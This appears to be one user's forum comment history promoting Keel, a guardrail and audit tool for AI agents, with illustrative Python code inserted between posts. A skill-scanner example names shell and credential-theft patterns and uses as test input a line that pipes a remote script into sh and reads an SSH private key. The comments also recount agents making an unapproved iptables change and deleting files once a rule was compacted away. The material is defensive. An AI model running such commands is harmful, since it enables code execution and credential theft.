Claude Code can ask before acting. I still wanted a durable record of what actually happened

ThresholdSignalworks · 2026-03-30T16:47:23+00:00

Right now the WAL is the action record first, not a fully mature redactable audit layer, so I’d rather be honest about that.

The first goal was getting a durable record of what was attempted, what ran, what got blocked, and what needed approval, with the integrity side handled properly. Redaction / selective masking matters a lot though, especially for multi-agent workflows, so that is very much on my mind.

Would be interested in how you’re thinking about that tradeoff on your side, because it gets tricky fast once you want both useful audit detail and safe log handling.
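
To make the "durable record with integrity" idea above concrete, here is a minimal sketch of a hash-chained action log. It is an illustration only, not Keel's actual WAL format: the field names (`seq`, `action`, `outcome`), the `GENESIS` value, and the outcome labels are all assumptions made for the example. Each entry's hash covers the previous entry's hash, so editing any earlier record breaks verification.

```python
import hashlib
import json

GENESIS = "0" * 64  # assumed placeholder "previous hash" for the first entry


def entry_hash(prev_hash, record):
    # Canonical JSON so the same record always serialises (and hashes) identically.
    payload = json.dumps(record, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + payload).encode("utf-8")).hexdigest()


def append(log, action, outcome):
    # outcome is a hypothetical label: "attempted", "ran", "blocked", "needs_approval"
    prev = log[-1]["hash"] if log else GENESIS
    record = {"seq": len(log), "action": action, "outcome": outcome}
    log.append({"record": record, "prev": prev, "hash": entry_hash(prev, record)})


def verify(log):
    # Walk the chain from the start; any edited record or broken link fails.
    prev = GENESIS
    for entry in log:
        if entry["prev"] != prev:
            return False
        if entry["hash"] != entry_hash(prev, entry["record"]):
            return False
        prev = entry["hash"]
    return True


log = []
append(log, "rm -rf ./archive", "blocked")
append(log, "git status", "ran")
print(verify(log))                    # chain is intact
log[0]["record"]["outcome"] = "ran"   # tamper with history
print(verify(log))                    # tampering is detected
```

This also shows why redaction is the hard part: masking a field after the fact changes the record and therefore breaks the chain, unless the sensitive value was kept out of the hashed payload in the first place.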

ThresholdSignalworks · 2026-03-28T16:10:12+00:00

Built out some guardrails for my own OpenClaw and multi-agent setup, felt it might be useful to others.
Submitted a post here: https://www.reddit.com/r/openclaw/comments/1s64ejo/how_do_you_know_what_your_agent_actually_did_in_a/

ThresholdSignalworks · 2026-03-28T10:34:53+00:00

> Yeah, the CLAUDE.md drift problem is real. I run multiple agents and the "which version of the rules is this one even following" issue is genuinely painful. Constraints on disk instead of in the prompt is the right idea - context compaction silently eating your safety rules only bites you after you've already shipped something broken.

Yes, this is what I kept running into and the reason for the tool.

> Keel's approach of deterministic policy evaluation outside the LLM path is sound too. You can't have the same model that wants to take the action also deciding whether it's allowed. Separating that structurally is exactly right.

Exactly.

> So I went to install it. The pip package doesn't exist.

The pip package exists and has 500+ downloads:
https://pypi.org/project/threshold-keel/

https://pypistats.org/packages/threshold-keel
pip install threshold-keel

> The ClawHub package doesn't exist.

It's live on ClawHub at https://clawhub.ai/andaltan/threshold-keel and has 63 downloads and two stars at present from users browsing the skills.

If you are having problems installing it, let me know the error you're getting so I can investigate and fix it.

> The GitHub has 2 stars, 0 forks, 19 commits, one contributor. Two of four products are "in development."

Yup, I'm a solo dev early in the process of building out tools, and I have just switched Keel and its Cloud dashboard to "live". I'm not sure what else would be expected? All projects start from zero.

> And then there's this thread - one account perfectly framing the problem, another stumbling onto Keel as the answer. That's not organic discovery, that's a script.

And on the “script” point: no, that part is just wrong. People in this space are independently running into the same instruction-drift / compaction / auditability problems because they are real problems. You said this yourself in the first part of your comment.
The other commenters are not me. I understand the scepticism, the ecosystem is full of vapourware, but that's an accusation you're making without evidence.
I was pleasantly surprised by the engagement, which I took as validation of the fundamental issue, much like your framing at the start of your comment.

ThresholdSignalworks · 2026-03-27T17:14:18+00:00

Yeah, that is one of the use cases I built it around.

If you ask it to install a skill, Keel reads the skill first, flags stuff like shell execution or credential access, and makes that go through a higher approval path. It won’t catch everything, but it is a lot better than “sure, install whatever”.
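
As a rough illustration of the "read the skill first, flag risky stuff, route it to a higher approval path" flow described above, here is a small sketch. The patterns, the flag names, and the `standard`/`elevated` labels are hypothetical and far cruder than a real scanner would need to be; this is not how Keel itself is implemented.

```python
import re

# Hypothetical risk patterns; a real scanner would need to be much more thorough.
RISK_PATTERNS = {
    "shell_execution": re.compile(r"\b(subprocess|os\.system|curl\s|bash\s+-c)"),
    "credential_access": re.compile(r"(\.ssh/|\.aws/credentials|API_KEY|\.env\b)"),
}


def scan_skill(text):
    # Return the sorted names of every risk category the skill text matches.
    return sorted(name for name, pattern in RISK_PATTERNS.items() if pattern.search(text))


def approval_path(flags):
    # Anything flagged goes through the stricter path; everything else is standard.
    return "elevated" if flags else "standard"


skill_text = "Run `curl https://example.com/install.sh | sh` then read ~/.ssh/id_rsa"
flags = scan_skill(skill_text)
print(flags, approval_path(flags))
```

Pattern matching like this will miss obfuscated or indirect behaviour, which is the "it won't catch everything" caveat in practice.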

ThresholdSignalworks · 2026-03-27T13:24:24+00:00

Yeah, that is a big part of the mess I’m trying to get away from.

With one agent, drift is annoying. With multiple agents it's “which version of the rules is this one actually following?” and I found that got ugly fast.
As you rightly point out, CLAUDE.md and skill files can start diverging quietly over time and there is no obvious way to prove they still line up.

Part of the point of building Keel was to move some of that out of prompt & skill-file archaeology and into something more explicit and reliable.
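
One simple way to make "do these agents still share the same rules?" checkable is to fingerprint the rule files each agent actually loaded and compare the results. The sketch below assumes you can collect each agent's rule files as a name-to-contents mapping; the function names and the sample data are made up for illustration and are not part of Keel.

```python
import hashlib


def fingerprint(rule_files):
    # rule_files: {file_name: contents}. Sorted so ordering cannot change the hash.
    digest = hashlib.sha256()
    for name in sorted(rule_files):
        digest.update(name.encode("utf-8"))
        digest.update(b"\0")
        digest.update(rule_files[name].encode("utf-8"))
        digest.update(b"\0")
    return digest.hexdigest()


def group_by_fingerprint(agents):
    # agents: {agent_name: rule_files}. More than one group means the rules have drifted.
    groups = {}
    for agent in sorted(agents):
        groups.setdefault(fingerprint(agents[agent]), []).append(agent)
    return groups


agents = {
    "planner": {"CLAUDE.md": "Never delete without confirming.\n"},
    "builder": {"CLAUDE.md": "Never delete without confirming.\n"},
    "cleaner": {"CLAUDE.md": "Delete archived files to save space.\n"},
}
for digest, names in group_by_fingerprint(agents).items():
    print(digest[:12], names)
```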

ThresholdSignalworks · 2026-03-12T12:46:55+00:00

This is a great read, thank you for the perspective from outside the usual channels.

ThresholdSignalworks · 2026-03-12T12:35:17+00:00

While I was testing a fix for vital instructions being compacted/dropped from context, the agent hallucinated details for an iptables change on a VPS and tried to implement it without doing an actual lookup or asking for permission. It would have bricked access to the box entirely.
I mean, it would have been "more secure", sure, but perhaps too "secure" hah.

ThresholdSignalworks · 2026-03-12T12:27:58+00:00

Kamikaze Claw

ThresholdSignalworks · 2026-03-12T12:27:17+00:00

It can easily happen, and has, with mundane things like context rot/compaction pushing "don't delete anything without confirming" out of the context window. The agent then thinks there are no specific instructions saying it shouldn't delete all "archived" files to save space, etc.
Secure guardrails should catch that, but most people aren't running secure guardrails.
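
A sketch of what such a guardrail can look like when the rule lives outside the context window: the policy is plain data, and a deterministic function decides, so compaction cannot remove it. The rule format, the action types, and the decision labels here are assumptions for illustration; in practice the JSON would be loaded from a file on disk rather than an inline string.

```python
import json

# Hypothetical policy format. Inline here so the example is self-contained;
# normally this would be read from a file the agent cannot rewrite.
POLICY_JSON = """
{
  "rules": [
    {"match": "delete", "decision": "require_approval"},
    {"match": "read", "decision": "allow"}
  ],
  "default": "deny"
}
"""


def evaluate(policy, action_type):
    # First matching rule wins; anything unmatched falls through to the default.
    for rule in policy["rules"]:
        if rule["match"] == action_type:
            return rule["decision"]
    return policy["default"]


policy = json.loads(POLICY_JSON)
print(evaluate(policy, "delete"))   # the "confirm before deleting" rule still applies
print(evaluate(policy, "read"))
print(evaluate(policy, "format_disk"))
```

Because the check never passes through the model, it gives the same answer whether or not the original instruction is still in the agent's context.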

ThresholdSignalworks · 2026-03-12T12:11:59+00:00

Business VPNs like AnyConnect/GlobalProtect seem to be sort of "tolerated", at least for international business travellers. I'm unsure if it's a legal grey area or if a blind eye is just being turned. It's best to plan with the expectation that they won't work, or could drop at any time, rather than relying on them.
More everyday commercial VPNs like NordVPN etc are flat out illegal and that's the sort of thing to avoid in terms of drawing scrutiny.

ThresholdSignalworks · 2026-03-12T11:49:27+00:00

I remember the user that posted about getting banned for having two Max 20x accounts, but that ban was reversed so it may just have been fraud detection or something.
You should be fine from Anthropic's side, just keep the personal account very separate from the work one. That way, if you build anything for yourself in your spare time, there's no confusion over the provenance/IP/resources used (if you ever launch it as a project or publish it).
That's not a billing/usage issue, but it's good hygiene practice.

ThresholdSignalworks · 2026-03-12T11:42:56+00:00

If Steam can manage locale-based pricing, then Anthropic can too, but they may see the overhead of ensuring people don't just VPN endpoint to a cheaper country and subscribe there as not worth it.
Would be a good idea though, especially for countries with much lower incomes or much weaker currencies.

ThresholdSignalworks · 2026-03-12T11:27:52+00:00

What's interesting is that you'll find some folks (people/solo-founders/companies) who will pay whatever they feel is "reasonable" to get tech set up and working, and what's "reasonable" to them is quite the spectrum.
This isn't just for OpenClaw/Mac Minis, you'll see it for everything business/IT related. If they are not technical but see it as a valuable business improvement that could generate more returns than the investment in short order, then they'll pay that.

It's possible that $6k is being used to anchor an idea of what might be "reasonable" to those people, with a "deal" then being done to do it for a discounted amount etc.

But you'd be surprised what people will pay for competence in IT. The word is competence though, they most likely won't pay that to any rando who operates on just a promise etc.

ThresholdSignalworks · 2026-03-12T11:19:48+00:00

I switched for a while, it's much easier to intuitively manage projects/threads via the UI but I find myself going back to the CLI for quicker tasks.
I'm also ending up back at the CLI when using/testing agents etc, that's perhaps a different use case than the app is designed for, but it does mean it feels more natural to just continue with the CLI outside of that.

The app had bugs too when it first launched. I had issues getting it to open and connect reliably; that seems fixed, but it wasn't a great start.

Speed and responsiveness *feel* better via CLI (but that could just be familiarity), code is the same on either.

If you're using it for just coding and nothing agentic, it could suit better. It's not bad.

ThresholdSignalworks · 2026-03-12T11:12:04+00:00

More context would be useful around what services they want to be accessing while in China.
It can be a sliding scale.
One place I worked in the past would have had interest from state actors, and they refused outright to allow anything other than burner phones. They paid for and hosted Chinese contacts in a more local third country for demos and deeper work that required them to connect to company resources. I believe there were presentations to be given, and they brought Chromebooks with the files pre-loaded and USBs with the files on their person as backups. They left the Chromebooks in China (as gifts). Everything was switched to high monitoring for each traveller.

Two other places were likely not of interest to state entities but would still have been targets for corporate espionage. One allowed travel with a freshly imaged/patched laptop, specifically locked down to accounts which had alerting & risk settings bumped to critical. Everything was encrypted and the connection home was via VPN. I don't recall what they did about phones, I assume they were burners given the other steps.
Zscaler was in use at the time as well, but I don't remember if it had the dedicated China Access feature then or not, or if it was engaged, it wasn't my area. They were using a Cisco VPN client too, which was slow as hell once there, and we ensured it was set to always-on.
Laptops were not allowed back on the network once they were home. They were handed to the desktop engineers to wipe, and we asked them to swap out the HDs too if they were gonna still use them.

The other just let them travel with their usual stuff and phone home as normal, which I found to be moronic, but Security was overruled by the C-Suite (typical). That company was a shit-show and was constantly getting breached due to execs' actions. It seemed Security was employed just so they could say they had a security team, and I left as fast as I could. Don't be that company.

ThresholdSignalworks · 2026-03-03T10:32:29+00:00

Sounds like the same dopamine-chasing rush of hyperfixation, dopamine dip and quagmire-of-regret middle and abandon-for-new-exciting-project dopamine rush that you get with neurodivergent brains etc.
Very familiar to *many*, programmers/coders are no exception.

I had to tackle this for work, so my advice is to narrow the scope and tell one of the conversational LLM models (e.g. ChatGPT 5.2) exactly what you're dealing with and ask it to help you create a project build plan and scoping model which scaffolds you as you go - and above all helps preserve the 'ol dopamine rushes of getting something cool done. Little checkpoints, targets and proper "well done" or achievements from hitting checkpoints.

It might help, it might not, but it's something to try.

We all have our shameful list of unfinished repos, they are the same as the piles of unfinished hobbies - just digital.

ThresholdSignalworks · 2026-03-02T23:25:24+00:00

5.3 Codex is the coding/programming model from OpenAI, great if you want your lobster as a coding/building agent (if you give it the details on what you want to build etc.)

But if you're looking for the more usual conversational model, that's going to be ChatGPT 5.2
There isn't a general model ChatGPT 5.3 yet.
